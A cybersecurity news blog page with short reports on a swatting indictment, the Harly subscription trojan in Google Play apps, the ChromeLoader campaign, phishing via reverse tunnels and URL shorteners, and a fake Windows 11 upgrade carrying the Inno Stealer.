Steve Bernd, FBI Seattle's public affairs officer, said, "The FBI takes swatting extremely seriously because it puts innocent people at harm." Since at least ten years ago, police have been discussing the "swatting" issue, and more recent headlines have been made about other incidents.

Indictments for extortion and threats were issued against a Seattle man just last month after more than 20 swat calls to the police were made by him. It is said that the man would broadcast these calls live to a certain Discord group.
Read more »
malware
Google Play Store Joker malware Kaspersky Malicious Apps Malicious Campaign malware

Harley Trojan Affecting the Users by Impersonating the Applications

 

There are numerous unpatched malwares hidden under the apps in the Google Play Store that seem to be harmless but are actually malicious programs. Google Play Store is an official platform that runs every process with careful monitoring carried out by the moderators. However, some apps may evade the moderator's check since it's not possible to check all the apps before they go live on the platform. 

One such popular malware, called Trojan Subscribers has been discovered by Kaspersky. It affects the users by signing up for paid services without their knowledge. The malware exhibits similarities with the Jocker Trojan subscriber, experts presume that the two have a common origin. 

A trojan is a malicious code or software that gets downloaded onto a system, disguised as an authorized application. 

In the past 3 years, over 190 apps have been found infected with Harly Trojan on the Google play store, and the number of downloads of such apps is more than 4.8 million.  

To spread the virus to different systems, the threat actors download the original applications and place their malicious code into them and later re-upload them to Google Play Store with some other name. 

The attackers play smart by keeping the same features in the app as listed in the description so that the users do not suspect a threat. The impersonating of legitimate apps also provides advertisement. 

The Trojan malware belonging to the Harley family includes a payload inside the application and uses numerous methods to decrypt and execute the payload. 

After the decryption, the Harley gathers information about the user’s device including the mobile network. By connecting to the mobile network, the malware opens up a list of subscription addresses from a C&C server, where it automatically enters the user's mobile number followed by other options to continue the process, including the OTP from messages. As a result, the user ends up with a paid subscription for a service without their knowledge or consent.  

To avoid being a victim of such apps, anti-virus experts suggest looking for reviews of the applications before downloading them. Google has been notified about such apps and asked to remove all the Trojan-infected apps from the platform and devices that are infected with them. 
Read more »
Vmware vulnerability
Chrome Malicious Campaign malware Malware Campaign VMware Vmware vulnerability

ChromeLoader: Microsoft, VMware Warns of the New Malware Campaigns

 

Microsoft and VMware are warning about the ongoing widespread malware campaign of ChromeLoader, which led to an “ongoing wide-ranging click frauds” later this year. 

The malware tool named ChromeLoader is apparently hijacking the browsers to redirect users to ad pages. The software has now evolved into a potential threat by deploying more potent payloads that go beyond malvertising. Variants of ChromeLoader have been dropping malicious browser extensions, node WebKit malware, and even ransomware on Windows PCs and Macs. 

Functioning of ChromeLoader 

Microsoft detected an ongoing widespread campaign of click frauds and attributed it to a threat actor DEV-0796. The malware attack begins with an ISO file that is downloaded when the user clicks a malicious ad, browser redirects, or Youtube comment. The attackers seek to profit from clicks generated by malicious browser extensions or node-WebKit that they have installed on the victim’s device, without being detected.  

The researchers from VMware’s Carbon Black Managed Detection and Response (MDR) team said they have seen the malware’s operators impersonating various legitimate services that would lead users to ChromeLoader. The researchers observed hundreds of attacks that included variants of the malware, targeting multiples sectors such as education, government, healthcare, and enterprises in business services. 

“This campaign has gone through many changes over the past few months, and we don’t expect it to stop [...] It is imperative that these industries take note of the prevalence of this threat and prepare to respond to it” warns the researchers. 

Rapid Evolution Of Malware

Earlier, the malware infected Chrome with a malicious extension that redirected the user traffic to advertising sites performing click frauds and generating income for the threat actors. “But, it later evolved into an ‘info-stealer’, stealing sensitive data stored in browsers and deploying zip bombs (i.e. malicious archive files) to crash systems, while still retaining its adware function,” said researchers, in an advisory released on September 19. 

Since Adware does not cause any significant damage to a victim’s software, the threat is not taken seriously by analysts. However, any software, such as ChromeLoader, that could enter a system undetected, is an immediate threat to a user, as the victim may as well apply modifications, facilitating monetization options for the malware. 

“The Carbon Black MDR team believes that this is an emerging threat that needs to be tracked and taken seriously [...] due to its potential for delivering more nefarious malware,” VMware said in the advisory. 
Read more »
URL Shorteners
Cyber Attacks Malicious Campaign Phishing Campaign Reverse Tunnels URL Shorteners

Reverse Tunnels and URL Shorteners Employed by Attackers to Launch Phishing Campaign

 

Security researchers at CloudSEK, a digital risk protection firm have witnessed a significant surge in the usage of reverse tunnel services and URL shorteners in conjunction with wide-scale phishing campaigns. 

The methodology employed by attackers is different from the more typical modus operandi of registering domains with hosting providers, who are more likely to react to complaints and shut down the malicious sites. 

The reverse tunnel services assist threat actors in hosting phishing pages locally using their devices and route connections via the external service. Additionally, they can develop new URLs through the URL shortening services as many times as required to bypass security detection. Many of the phishing URLs are updated in less than 24 hours, making it more difficult for researchers to spot and take down malicious domains. 

As reported by BleepingComputer, researchers have identified more than 500 sites hosted and distributed using a combination of reverse tunneling and URL shortening. Ngrok, LocalhostRun, and Argo were the most commonly abused reverse tunnel services, while Bit.ly, is.gd, and cutt.ly were the most prevalent URL shorteners. 

According to CloudSEK, cybercriminals may hide their identity by using URL shorteners to mask the name of the URL, which is typically a series of random characters. The malicious links are distributed via Telegram, WhatsApp, phony social media pages, texts, and emails. 

It is worth noting that the cybersecurity landscape is not unfamiliar with the exploit of reverse tunneling. For example, the digital banking platform of the State Bank of India had been previously impersonated for such phishing campaigns to exfiltrate users’ credentials. 

The malicious link was concealed behind “cutt[.]ly/UdbpGhs” and directed to the domain “ultimate-boy-bacterial-generates[.]trycloudflare[.]com/sbi” that employed Cloudflare’s Argo tunneling service. Subsequently, the malicious page requested bank account credentials, PAN card numbers, Aadhaar unique identification numbers, and mobile phone numbers. However, CloudSEK did not share how damaging this campaign was for bank users. 

Private details collected this way can be sold on the dark web or used by hackers to drain bank accounts. If the data is from a firm, the attackers could use it to launch ransomware attacks or business email compromise (BEC) scams. To mitigate the risks, users should avoid clicking on links received from an unfamiliar source.
Read more »
User Security
Info Stealer Malicious Campaign malware User Security

Researchers Warn of Fake Windows 11 Upgrade Containing Info Stealing Malware

 

Cybercriminals are tricking users into installing a fake Windows 11 upgrade that includes malware that steals data from web browsers and crypto-wallets. The malicious campaign that is still running operates by poisoning search results to drive traffic to a website impersonating Microsoft’s Windows 11 advertising page and offering the information stealer. 

According to CloudSEK threat researchers who analyzed the malware and published a technical report, malicious actors are focusing on people who rush to install Windows 11 without first learning that the OS must satisfy specific requirements. 

The rogue website advertising the false Windows 11 has official Microsoft logos, favicons, and a “Download Now” button. It looks legitimate at first glance, but the URL reveals the site as fraudulent. If visitors access the malicious website directly (download is not possible via TOR or VPN), they will receive an ISO file containing the executable for new information-stealing malware. 

The CloudSEK researchers named the new malware 'Inno Stealer' as it uses the Inno Setup Windows Installer. The researchers said that Inno Stealer has no code in common with other presently circulating info-stealers. Once active, the malware plants a pair of files that disable various Windows security measures, including those in the registry. They also wipe out software from anti-virus companies Emsisoft and ESET. 

Inno Stealer’s capabilities are typical for this kind of malware, including the ability to collect web browser cookies and passwords, data from cryptocurrency wallets, and data from the disk. The set of targeted browsers and crypto wallets is extensive, including Chrome, Edge, Brave, Opera, Vivaldi, 360 Browser, and Comodo. 

The malware can also steal extra payloads, an action only performed at night, potentially to take advantage of the victim’s absence from the computer. These additional Delphi payloads, which are TXT files, use the same Inno-based loader that fiddles with the host’s security tools and employs an identical persistence methodology. They also have the ability to grab clipboard data and exfiltrate directory enumeration data. 

To mitigate the risks, researchers recommended avoiding downloading ISO files from obscure sources and instead undertaking significant OS updates using the Windows 10 control panel or obtaining the installation files directly from the source. If you can’t upgrade to Windows 11, there’s no point in attempting to bypass the limitations manually since this will come with a slew of drawbacks and severe security risks.
Read more »
Subscribe to: Posts (Atom)